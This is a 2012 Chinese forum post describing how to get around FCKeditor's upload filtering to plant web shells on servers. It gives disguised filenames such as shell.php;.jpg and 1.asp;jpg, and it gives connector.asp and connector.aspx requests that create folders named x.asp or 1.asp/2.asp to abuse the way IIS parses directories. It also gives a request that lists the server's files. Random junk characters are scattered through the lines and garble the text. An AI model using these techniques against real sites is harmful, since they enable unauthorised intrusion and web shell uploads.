很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg& Y' c: g6 f8 l. M/ z# ^
6 W) \+ Y' ~: F. `6 a5 V, K1 C
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。 a0 G* g- p6 S
* [: D% z" {/ v# ]继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。- W9 x# N: B6 m/ }& Q
7 l( }0 K1 \' C! X; o
突破建立文件夹:; W& A# P c! y0 W c
2 E, | r1 I5 h' ^editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
. n4 G4 o1 W( r3 u! u+ U& ~1 y: ~! N5 x3 _1 t% e
参数:2 b: ~3 d1 H2 J% v0 v' t, R
) K2 B" i" S6 Y0 o) F当前目录名:CurrentFolder=/qing.asp( X" J B' }! Y9 n( B$ A2 \2 ^; w
7 z- @+ H( r- P2 i* [0 @
新的目录名:NewFolderName=x.asp9 n0 B$ L, k: i! z. \
; R- U% M4 U2 f
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……# P( t' ]( W9 m; \3 q/ j- t
$ U2 G9 `5 j t' X( ]) Z那么 x.asp 就已经建立生成了,此方法百试百灵!1 R Y3 q8 N: e) @1 Z
' B" x; m* L" R @新建文件夹参数 x.asp,基本都能搞定。
* A9 Z- j, D) @# @2 C
' B& G; I2 f# D i下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
: _; o4 m9 E, K; M7 m
9 L! W$ w& U s! R2 N! w1 y/ maspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
' b1 c: q8 d- H1 k' p% S( g: @6 p- ~. G. \) @% d8 R+ W- _5 s
获取文件列表
3 Y. f( X% v% N aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F: H* l$ a: o; Z6 ^7 T& c* ?
# Y8 q! K* s+ w! k0 q' | |
发表于 2012-12-31 09:27:09
收藏
支持
反对